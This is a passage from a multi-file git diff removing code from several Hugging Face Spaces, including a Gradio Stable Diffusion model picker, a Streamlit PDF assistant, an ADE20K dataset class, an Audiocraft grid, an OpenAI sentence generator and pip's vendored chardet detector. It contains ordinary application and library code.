gr.Interface.load(f"models/{models[420]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[421]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[422]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[423]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[424]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[425]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[426]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[427]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[428]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[429]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[430]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[431]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[432]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[433]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[434]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[435]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[436]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[437]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[438]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[439]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[440]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[441]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[442]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[443]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[444]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[445]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[446]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[447]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[448]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[449]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[450]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[451]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[452]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[453]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[454]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[455]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[456]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[457]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[458]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[459]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[460]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[461]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[462]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[463]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[464]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[465]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[466]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[467]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[469]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[470]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[471]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[472]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[473]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[474]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[475]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[476]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[477]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[478]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[479]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[480]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[481]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[482]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[483]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[484]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[485]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[486]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[487]}",live=True,preprocess=False), -] - - -def text_it1(inputs,text_gen1=text_gen1): - go_t1=text_gen1(inputs) - return(go_t1) - -def set_model(current_model): - current_model = models[current_model] - return gr.update(label=(f"{current_model}")) - - -def send_it1(inputs, model_choice): #negative_prompt, - proc1=models2[model_choice] - output1=proc1(inputs) - #negative_prompt=negative_prompt - return(output1) -css="""""" - - -with gr.Blocks(css=css) as myface: - gr.HTML(""" -
      -
      - - -

      Toy World

      -
      - -
      -

      -

      Fast Diffusion - 480 Stable Diffusion models, but why? For your enjoyment!

      -

      -

      If a model is loaded each new image takes 20 seconds to generate!

      -

      -
      If you get ERROR it's because that model ran out of memory, try again, or wait a minute and try again, have fun!

      -
      - """) - with gr.Row(): - with gr.Column(scale=100): - #Model selection dropdown - model_name1 = gr.Dropdown(label="Select Model", choices=[m for m in models], type="index", value=current_model, interactive=True) - with gr.Row(): - with gr.Column(scale=100): - magic1=gr.Textbox(label="Your Prompt", lines=4) #Positive - #with gr.Column(scale=100): - #negative_prompt=gr.Textbox(label="Negative Prompt", lines=1) - gr.HTML("""""") - run=gr.Button("Generate Image") - with gr.Row(): - with gr.Column(style="width=800px"): - output1=gr.Image(label=(f"{current_model}")) - - - with gr.Row(): - with gr.Column(scale=50): - input_text=gr.Textbox(label="Use this box to extend an idea automagically, by typing some words and clicking Extend Idea",lines=2) - see_prompts=gr.Button("Extend Idea -> overwrite the contents of the `Your Prompt´ box above") - use_short=gr.Button("Copy the contents of this box to the `Your Prompt´ box above") - def short_prompt(inputs): - return(inputs) - - model_name1.change(set_model,inputs=model_name1,outputs=[output1]) - - run.click(send_it1, inputs=[magic1, model_name1], outputs=[output1]) - - use_short.click(short_prompt,inputs=[input_text],outputs=magic1) - - see_prompts.click(text_it1,inputs=[input_text],outputs=magic1) - -myface.queue(concurrency_count=200) -myface.launch(inline=True, show_api=False, max_threads=400) \ No newline at end of file diff --git a/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx b/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx deleted file mode 100644 index 4adcb632226bfced8b97092782811edf08b56569..0000000000000000000000000000000000000000 --- a/spaces/Pengyey/bingo-chuchu/src/components/ui/voice/index.tsx +++ /dev/null @@ -1,28 +0,0 @@ -import './index.scss' - -export interface VoiceProps extends CSSPropertyRule { - num?: number; - duration?: number; -} -export default function Voice({ duration = 400, num = 7, ...others }) { - return ( -
      - {Array.from({ length: num }).map((_, index) => { - const randomDuration = Math.random() * 100 + duration - const initialDelay = Math.random() * 2 * duration - const initialScale = Math.sin((index + 1) * Math.PI / num) - return ( -
      - ) - })} -
      - ) -} diff --git a/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py b/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py deleted file mode 100644 index 5913e43775ed4920b6934c855eb5a37c54218ebf..0000000000000000000000000000000000000000 --- a/spaces/Pie31415/control-animation/annotator/uniformer/mmseg/datasets/ade.py +++ /dev/null @@ -1,84 +0,0 @@ -from .builder import DATASETS -from .custom import CustomDataset - - -@DATASETS.register_module() -class ADE20KDataset(CustomDataset): - """ADE20K dataset. - - In segmentation map annotation for ADE20K, 0 stands for background, which - is not included in 150 categories. ``reduce_zero_label`` is fixed to True. - The ``img_suffix`` is fixed to '.jpg' and ``seg_map_suffix`` is fixed to - '.png'. - """ - CLASSES = ( - 'wall', 'building', 'sky', 'floor', 'tree', 'ceiling', 'road', 'bed ', - 'windowpane', 'grass', 'cabinet', 'sidewalk', 'person', 'earth', - 'door', 'table', 'mountain', 'plant', 'curtain', 'chair', 'car', - 'water', 'painting', 'sofa', 'shelf', 'house', 'sea', 'mirror', 'rug', - 'field', 'armchair', 'seat', 'fence', 'desk', 'rock', 'wardrobe', - 'lamp', 'bathtub', 'railing', 'cushion', 'base', 'box', 'column', - 'signboard', 'chest of drawers', 'counter', 'sand', 'sink', - 'skyscraper', 'fireplace', 'refrigerator', 'grandstand', 'path', - 'stairs', 'runway', 'case', 'pool table', 'pillow', 'screen door', - 'stairway', 'river', 'bridge', 'bookcase', 'blind', 'coffee table', - 'toilet', 'flower', 'book', 'hill', 'bench', 'countertop', 'stove', - 'palm', 'kitchen island', 'computer', 'swivel chair', 'boat', 'bar', - 'arcade machine', 'hovel', 'bus', 'towel', 'light', 'truck', 'tower', - 'chandelier', 'awning', 'streetlight', 'booth', 'television receiver', - 'airplane', 'dirt track', 'apparel', 'pole', 'land', 'bannister', - 'escalator', 'ottoman', 'bottle', 'buffet', 'poster', 'stage', 'van', - 'ship', 'fountain', 'conveyer belt', 'canopy', 'washer', 'plaything', - 'swimming pool', 'stool', 'barrel', 'basket', 'waterfall', 'tent', - 'bag', 'minibike', 'cradle', 'oven', 'ball', 'food', 'step', 'tank', - 'trade name', 'microwave', 'pot', 'animal', 'bicycle', 'lake', - 'dishwasher', 'screen', 'blanket', 'sculpture', 'hood', 'sconce', - 'vase', 'traffic light', 'tray', 'ashcan', 'fan', 'pier', 'crt screen', - 'plate', 'monitor', 'bulletin board', 'shower', 'radiator', 'glass', - 'clock', 'flag') - - PALETTE = [[120, 120, 120], [180, 120, 120], [6, 230, 230], [80, 50, 50], - [4, 200, 3], [120, 120, 80], [140, 140, 140], [204, 5, 255], - [230, 230, 230], [4, 250, 7], [224, 5, 255], [235, 255, 7], - [150, 5, 61], [120, 120, 70], [8, 255, 51], [255, 6, 82], - [143, 255, 140], [204, 255, 4], [255, 51, 7], [204, 70, 3], - [0, 102, 200], [61, 230, 250], [255, 6, 51], [11, 102, 255], - [255, 7, 71], [255, 9, 224], [9, 7, 230], [220, 220, 220], - [255, 9, 92], [112, 9, 255], [8, 255, 214], [7, 255, 224], - [255, 184, 6], [10, 255, 71], [255, 41, 10], [7, 255, 255], - [224, 255, 8], [102, 8, 255], [255, 61, 6], [255, 194, 7], - [255, 122, 8], [0, 255, 20], [255, 8, 41], [255, 5, 153], - [6, 51, 255], [235, 12, 255], [160, 150, 20], [0, 163, 255], - [140, 140, 140], [250, 10, 15], [20, 255, 0], [31, 255, 0], - [255, 31, 0], [255, 224, 0], [153, 255, 0], [0, 0, 255], - [255, 71, 0], [0, 235, 255], [0, 173, 255], [31, 0, 255], - [11, 200, 200], [255, 82, 0], [0, 255, 245], [0, 61, 255], - [0, 255, 112], [0, 255, 133], [255, 0, 0], [255, 163, 0], - [255, 102, 0], [194, 255, 0], [0, 143, 255], [51, 255, 0], - [0, 82, 255], [0, 255, 41], [0, 255, 173], [10, 0, 255], - [173, 255, 0], [0, 255, 153], [255, 92, 0], [255, 0, 255], - [255, 0, 245], [255, 0, 102], [255, 173, 0], [255, 0, 20], - [255, 184, 184], [0, 31, 255], [0, 255, 61], [0, 71, 255], - [255, 0, 204], [0, 255, 194], [0, 255, 82], [0, 10, 255], - [0, 112, 255], [51, 0, 255], [0, 194, 255], [0, 122, 255], - [0, 255, 163], [255, 153, 0], [0, 255, 10], [255, 112, 0], - [143, 255, 0], [82, 0, 255], [163, 255, 0], [255, 235, 0], - [8, 184, 170], [133, 0, 255], [0, 255, 92], [184, 0, 255], - [255, 0, 31], [0, 184, 255], [0, 214, 255], [255, 0, 112], - [92, 255, 0], [0, 224, 255], [112, 224, 255], [70, 184, 160], - [163, 0, 255], [153, 0, 255], [71, 255, 0], [255, 0, 163], - [255, 204, 0], [255, 0, 143], [0, 255, 235], [133, 255, 0], - [255, 0, 235], [245, 0, 255], [255, 0, 122], [255, 245, 0], - [10, 190, 212], [214, 255, 0], [0, 204, 255], [20, 0, 255], - [255, 255, 0], [0, 153, 255], [0, 41, 255], [0, 255, 204], - [41, 0, 255], [41, 255, 0], [173, 0, 255], [0, 245, 255], - [71, 0, 255], [122, 0, 255], [0, 255, 184], [0, 92, 255], - [184, 255, 0], [0, 133, 255], [255, 214, 0], [25, 194, 194], - [102, 255, 0], [92, 0, 255]] - - def __init__(self, **kwargs): - super(ADE20KDataset, self).__init__( - img_suffix='.jpg', - seg_map_suffix='.png', - reduce_zero_label=True, - **kwargs) diff --git a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py b/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py deleted file mode 100644 index e7471fc85212f1d8502ce25bb5894c3c880de1be..0000000000000000000000000000000000000000 --- a/spaces/PrabhuKiranKonda/Streamlit-PDF-Assistant-Docker/Home.py +++ /dev/null @@ -1,139 +0,0 @@ -import streamlit as st -from components.sidebar.OpenAI_API import openai_api_insert_component -from components.body.file_uploader import file_uploader -from components.body.prompt import prompt_box -from components.body import langchain_PDF -from components.sidebar.Auth import authentication_comp, db -import pandas as pd -import os - - -st.set_page_config(page_title="PDF Assistant", page_icon="📖", layout="wide", initial_sidebar_state='expanded') - -if 'logged_in' not in st.session_state: - st.session_state['logged_in'] = False - -if 'username' not in st.session_state: - st.session_state['username'] = None - -if 'login_btn_clicked' not in st.session_state: - st.session_state['login_btn_clicked'] = None - -if 'uuid' not in st.session_state: - st.session_state['uuid'] = None - -if 'login_failed' not in st.session_state: - st.session_state['login_failed'] = None - -if 'response' not in st.session_state: - st.session_state['response'] = None - - -def main(): - st.header(":red[PDF Assistant]: AI-Powered Q&A for _PDFs_") - - if st.session_state['logged_in'] != False and st.session_state['username'] is not None: - st.sidebar.write(f"Welcome **:green[{st.session_state['username']}]** 👋") - - # st.write(os.getenv("FIREBASE_API")) - openai_api_insert_component() # Insert OpenAI API component in sidebar - - # if not logged in, show authentication component - if st.session_state['logged_in'] == False: - with st.sidebar: - authentication_comp() - - - # if logged in, show logout button - if st.session_state['logged_in'] == True: - with st.sidebar: - logout = st.button("Logout 🔒") - if logout: - st.session_state['logged_in'] = False - st.session_state['login_btn_clicked'] = None - st.session_state['username'] = None - st.session_state['uuid'] = None - st.session_state['signup_btn_clicked'] = None - st.button("dummy", on_click=st.experimental_rerun()) # dummy button to rerun the app. This is a hacky way to rerun the app. dummy btn is not shown to user. - - - file_uploader_col, prompt_col = st.columns([0.5, 1]) - with file_uploader_col: - file_uploader() - with prompt_col: - prompt_box() - - - generate_answer_button = st.button("Generate Answer") - if generate_answer_button: - - st.session_state['generate_answer_button'] = True - - # check if all are empty - if st.session_state['OPENAI_API_KEY'] == "" and st.session_state['uploaded_file'] is None and st.session_state['prompt'] == "": - st.error("Please set your OpenAI API key in the sidebar, upload a PDF and enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if API key is empty - elif st.session_state['OPENAI_API_KEY'] == "" or st.session_state['OPENAI_API_KEY'] is None: - st.sidebar.error("Please set your OpenAI API key in the sidebar.") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if file is not uploaded and prompt is empty - elif st.session_state['uploaded_file'] is None and st.session_state['prompt'] == "": - st.error("Please upload a PDF and enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if file is not uploaded - elif st.session_state['uploaded_file'] is None: - st.error("Please upload a PDF") - st.session_state['cancel_btn_active'] = True - # st.stop() - - # check if prompt is empty - elif st.session_state['prompt'] == "": - st.error("Please enter a prompt") - st.session_state['cancel_btn_active'] = True - # st.stop() - - else: # if everything is fine - os.environ['OPENAI_API_KEY'] = st.session_state['OPENAI_API_KEY'] - st.caption(f"Filename: :red[{st.session_state['uploaded_file'].name}]") - response = langchain_PDF.get_response_from_OpenAI_LangChain(st.session_state['uploaded_file'], st.session_state['prompt']) - # st.session_state['response'] = response - st.warning('⚠️ Please note that the response is dependent on the :red[Quality of the PDF] and the :red[Quality of the prompt] and it may not be accurate at times. Please use the response as a reference and not as a final answer.') - - - if st.session_state['response'] is not None: - st.write("") - st.write("###### :blue[🤖 **AI Response**]") - st.write(f"#### :green[{st.session_state['response']}]") - st.markdown("------------") - - if st.session_state['logged_in'] == True and st.session_state['username'] is not None: - show_history = st.checkbox("Show History") - - if show_history: - st.write("Your previous interactions are as follows:") - past_docs = db.child("users").child(st.session_state['uuid']).child('pdf_files').get().val() - if past_docs: - selected_doc = st.selectbox("Select a PDF file", options=list(past_docs.keys())) - df = pd.DataFrame.from_dict(past_docs[selected_doc]['Prompts'], orient='index', columns=['prompt', 'response']) - hide_table_row_index = """ - - """ - st.markdown(hide_table_row_index, unsafe_allow_html=True) - st.table(df) - - else: - st.write("##### 😔 :red[No history found.]") - -if __name__ == "__main__": - main() - \ No newline at end of file diff --git a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py b/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py deleted file mode 100644 index 5612ff5688d85fede0e605b244919e8081cb1da9..0000000000000000000000000000000000000000 --- a/spaces/Prof-Reza/Audiocraft_Music-Audio_Generation/audiocraft/grids/compression/debug.py +++ /dev/null @@ -1,31 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid is a minimal example for debugging compression task -and how to override parameters directly in a grid. -Learn more about dora grids: https://github.com/facebookresearch/dora -""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=2, partition=partitions) - launcher.bind_(solver='compression/debug') - - with launcher.job_array(): - # base debug task using config from solver=compression/debug - launcher() - # we can override parameters in the grid to launch additional xps - launcher({'rvq.bins': 2048, 'rvq.n_q': 4}) diff --git a/spaces/RKocielnik/bias-test-gpt/openAI_manager.py b/spaces/RKocielnik/bias-test-gpt/openAI_manager.py deleted file mode 100644 index 3a0ec90a59697846abae3b53339d087e432ede8d..0000000000000000000000000000000000000000 --- a/spaces/RKocielnik/bias-test-gpt/openAI_manager.py +++ /dev/null @@ -1,89 +0,0 @@ -import openai -import backoff -import json -import re - -def initOpenAI(key): - openai.api_key = key - - # list models - models = openai.Model.list() - - return models - -# construct prompts from example_shots -def examples_to_prompt(example_shots, kwd_pair): - prompt = "" - for shot in example_shots: - prompt += "Keywords: "+', '.join(shot['Keywords'])+" ## Sentence: "+ \ - shot['Sentence']+" ##\n" - prompt += f"Keywords: {kwd_pair[0]}, {kwd_pair[1]} ## Sentence: " - return prompt - -def genChatGPT(model_name, kwd_pair, num2gen, numTries, example_shots, temperature=0.8): - # construct prompt - instruction = f"Write a sentence including terms \"{kwd_pair[0]}\" and \"{kwd_pair[1]}\"."# Use examples as guide for the type of sentences to write." - #prompt = examples_to_prompt(example_shots, kwd_pair) - #print(f"Prompt: {prompt}") - #print(f"Instruction: {instruction}") - - # https://github.com/openai/openai-cookbook/blob/main/examples/How_to_handle_rate_limits.ipynb - @backoff.on_exception(backoff.expo, (openai.error.RateLimitError, - openai.error.APIError, - ConnectionResetError, - json.decoder.JSONDecodeError))#, - #max_time=300, - #raise_on_giveup=False, - #giveup=fatal_code) - - def completions_with_backoff(**kwargs): - return openai.ChatCompletion.create(**kwargs) - - resp = [] - tries = 0 - while len(resp) < num2gen and tries < numTries: - # Prompt OpenAI - # https://platform.openai.com/docs/api-reference/chat/create - response = completions_with_backoff(model=model_name, - temperature=temperature, - messages=[{"role": "system", "content": instruction}]) - # ,{"role": "user", "content": prompt} - - sentence = response["choices"][0]["message"]["content"] - - fnd_kwd_0 = list(re.finditer(f'{kwd_pair[0].lower()}[ .,!]+', sentence.lower())) - fnd_kwd_1 = list(re.finditer(f'{kwd_pair[1].lower()}[ .,!]+', sentence.lower())) - if len(fnd_kwd_0)>0 and len(fnd_kwd_1)>0: - resp.append([kwd_pair[0], kwd_pair[1], sentence]) - - tries += 1 - - return resp - -# generate sentences -def generateTestSentences(model_name, group_kwds, attribute_kwds, progress): - fixed_shots = [ - {"Keywords": ["dog", "frisbee", "catch", "throw"], "Sentence": "A dog leaps to catch a thrown frisbee"}, - {"Keywords": ["apple", "bag", "puts"], "Sentence": "A girl puts an apple in her bag"}, - {"Keywords": ["apple", "tree", "pick"], "Sentence": "A man picks some apples from a tree"}, - {"Keywords": ["apple", "basket", "wash"], "Sentence": "A boy takes an apple from a basket and washes it"}, - {"Keywords": ["white old man", "ceo"], "Sentence": "A white old man was a ceo of a big international company"} - ] - - print(f"Groups: [{group_kwds}]\nAttributes: [{attribute_kwds}]") - - numTries = 5 - num2gen = 2 - all_gens = [] - num_steps = len(group_kwds)*len(attribute_kwds) - for gi, grp_kwd in enumerate(group_kwds): - for ai, att_kwd in enumerate(attribute_kwds): - progress((gi*len(attribute_kwds)+ai)/num_steps, desc=f"Generating {grp_kwd}<>{att_kwd}...") - - kwd_pair = [grp_kwd.strip(), att_kwd.strip()] - - gens = genChatGPT(model_name, kwd_pair, num2gen, numTries, fixed_shots, temperature=0.8) - #print(f"Gens for pair: <{kwd_pair}> -> {gens}") - all_gens.extend(gens) - - return all_gens diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py deleted file mode 100644 index 22fcf8290c1026d3ae35c6ae605a67b3f24c85e7..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/chardet/universaldetector.py +++ /dev/null @@ -1,328 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### -""" -Module containing the UniversalDetector detector class, which is the primary -class a user of ``chardet`` should use. - -:author: Mark Pilgrim (initial port to Python) -:author: Shy Shalom (original C code) -:author: Dan Blanchard (major refactoring for 3.0) -:author: Ian Cordasco -""" - - -import codecs -import logging -import re - -from .charsetgroupprober import CharSetGroupProber -from .enums import InputState, LanguageFilter, ProbingState -from .escprober import EscCharSetProber -from .latin1prober import Latin1Prober -from .mbcsgroupprober import MBCSGroupProber -from .sbcsgroupprober import SBCSGroupProber -from .utf1632prober import UTF1632Prober - - -class UniversalDetector: - """ - The ``UniversalDetector`` class underlies the ``chardet.detect`` function - and coordinates all of the different charset probers. - - To get a ``dict`` containing an encoding and its confidence, you can simply - run: - - .. code:: - - u = UniversalDetector() - u.feed(some_bytes) - u.close() - detected = u.result - - """ - - MINIMUM_THRESHOLD = 0.20 - HIGH_BYTE_DETECTOR = re.compile(b"[\x80-\xFF]") - ESC_DETECTOR = re.compile(b"(\033|~{)") - WIN_BYTE_DETECTOR = re.compile(b"[\x80-\x9F]") - ISO_WIN_MAP = { - "iso-8859-1": "Windows-1252", - "iso-8859-2": "Windows-1250", - "iso-8859-5": "Windows-1251", - "iso-8859-6": "Windows-1256", - "iso-8859-7": "Windows-1253", - "iso-8859-8": "Windows-1255", - "iso-8859-9": "Windows-1254", - "iso-8859-13": "Windows-1257", - } - - def __init__(self, lang_filter=LanguageFilter.ALL): - self._esc_charset_prober = None - self._utf1632_prober = None - self._charset_probers = [] - self.result = None - self.done = None - self._got_data = None - self._input_state = None - self._last_char = None - self.lang_filter = lang_filter - self.logger = logging.getLogger(__name__) - self._has_win_bytes = None - self.reset() - - @property - def input_state(self): - return self._input_state - - @property - def has_win_bytes(self): - return self._has_win_bytes - - @property - def charset_probers(self): - return self._charset_probers - - def reset(self): - """ - Reset the UniversalDetector and all of its probers back to their - initial states. This is called by ``__init__``, so you only need to - call this directly in between analyses of different documents. - """ - self.result = {"encoding": None, "confidence": 0.0, "language": None} - self.done = False - self._got_data = False - self._has_win_bytes = False - self._input_state = InputState.PURE_ASCII - self._last_char = b"" - if self._esc_charset_prober: - self._esc_charset_prober.reset() - if self._utf1632_prober: - self._utf1632_prober.reset() - for prober in self._charset_probers: - prober.reset() - - def feed(self, byte_str): - """ - Takes a chunk of a document and feeds it through all of the relevant - charset probers. - - After calling ``feed``, you can check the value of the ``done`` - attribute to see if you need to continue feeding the - ``UniversalDetector`` more data, or if it has made a prediction - (in the ``result`` attribute). - - .. note:: - You should always call ``close`` when you're done feeding in your - document if ``done`` is not already ``True``. - """ - if self.done: - return - - if not byte_str: - return - - if not isinstance(byte_str, bytearray): - byte_str = bytearray(byte_str) - - # First check for known BOMs, since these are guaranteed to be correct - if not self._got_data: - # If the data starts with BOM, we know it is UTF - if byte_str.startswith(codecs.BOM_UTF8): - # EF BB BF UTF-8 with BOM - self.result = { - "encoding": "UTF-8-SIG", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith((codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE)): - # FF FE 00 00 UTF-32, little-endian BOM - # 00 00 FE FF UTF-32, big-endian BOM - self.result = {"encoding": "UTF-32", "confidence": 1.0, "language": ""} - elif byte_str.startswith(b"\xFE\xFF\x00\x00"): - # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = { - "encoding": "X-ISO-10646-UCS-4-3412", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith(b"\x00\x00\xFF\xFE"): - # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = { - "encoding": "X-ISO-10646-UCS-4-2143", - "confidence": 1.0, - "language": "", - } - elif byte_str.startswith((codecs.BOM_LE, codecs.BOM_BE)): - # FF FE UTF-16, little endian BOM - # FE FF UTF-16, big endian BOM - self.result = {"encoding": "UTF-16", "confidence": 1.0, "language": ""} - - self._got_data = True - if self.result["encoding"] is not None: - self.done = True - return - - # If none of those matched and we've only see ASCII so far, check - # for high bytes and escape sequences - if self._input_state == InputState.PURE_ASCII: - if self.HIGH_BYTE_DETECTOR.search(byte_str): - self._input_state = InputState.HIGH_BYTE - elif ( - self._input_state == InputState.PURE_ASCII - and self.ESC_DETECTOR.search(self._last_char + byte_str) - ): - self._input_state = InputState.ESC_ASCII - - self._last_char = byte_str[-1:] - - # next we will look to see if it is appears to be either a UTF-16 or - # UTF-32 encoding - if not self._utf1632_prober: - self._utf1632_prober = UTF1632Prober() - - if self._utf1632_prober.state == ProbingState.DETECTING: - if self._utf1632_prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": self._utf1632_prober.charset_name, - "confidence": self._utf1632_prober.get_confidence(), - "language": "", - } - self.done = True - return - - # If we've seen escape sequences, use the EscCharSetProber, which - # uses a simple state machine to check for known escape sequences in - # HZ and ISO-2022 encodings, since those are the only encodings that - # use such sequences. - if self._input_state == InputState.ESC_ASCII: - if not self._esc_charset_prober: - self._esc_charset_prober = EscCharSetProber(self.lang_filter) - if self._esc_charset_prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": self._esc_charset_prober.charset_name, - "confidence": self._esc_charset_prober.get_confidence(), - "language": self._esc_charset_prober.language, - } - self.done = True - # If we've seen high bytes (i.e., those with values greater than 127), - # we need to do more complicated checks using all our multi-byte and - # single-byte probers that are left. The single-byte probers - # use character bigram distributions to determine the encoding, whereas - # the multi-byte probers use a combination of character unigram and - # bigram distributions. - elif self._input_state == InputState.HIGH_BYTE: - if not self._charset_probers: - self._charset_probers = [MBCSGroupProber(self.lang_filter)] - # If we're checking non-CJK encodings, use single-byte prober - if self.lang_filter & LanguageFilter.NON_CJK: - self._charset_probers.append(SBCSGroupProber()) - self._charset_probers.append(Latin1Prober()) - for prober in self._charset_probers: - if prober.feed(byte_str) == ProbingState.FOUND_IT: - self.result = { - "encoding": prober.charset_name, - "confidence": prober.get_confidence(), - "language": prober.language, - } - self.done = True - break - if self.WIN_BYTE_DETECTOR.search(byte_str): - self._has_win_bytes = True - - def close(self): - """ - Stop analyzing the current document and come up with a final - prediction. - - :returns: The ``result`` attribute, a ``dict`` with the keys - `encoding`, `confidence`, and `language`. - """ - # Don't bother with checks if we're already done - if self.done: - return self.result - self.done = True - - if not self._got_data: - self.logger.debug("no data received!") - - # Default to ASCII if it is all we've seen so far - elif self._input_state == InputState.PURE_ASCII: - self.result = {"encoding": "ascii", "confidence": 1.0, "language": ""} - - # If we have seen non-ASCII, return the best that met MINIMUM_THRESHOLD - elif self._input_state == InputState.HIGH_BYTE: - prober_confidence = None - max_prober_confidence = 0.0 - max_prober = None - for prober in self._charset_probers: - if not prober: - continue - prober_confidence = prober.get_confidence() - if prober_confidence > max_prober_confidence: - max_prober_confidence = prober_confidence - max_prober = prober - if max_prober and (max_prober_confidence > self.MINIMUM_THRESHOLD): - charset_name = max_prober.charset_name - lower_charset_name = max_prober.charset_name.lower() - confidence = max_prober.get_confidence() - # Use Windows encoding name instead of ISO-8859 if we saw any - # extra Windows-specific bytes - if lower_charset_name.startswith("iso-8859"): - if self._has_win_bytes: - charset_name = self.ISO_WIN_MAP.get( - lower_charset_name, charset_name - ) - self.result = { - "encoding": 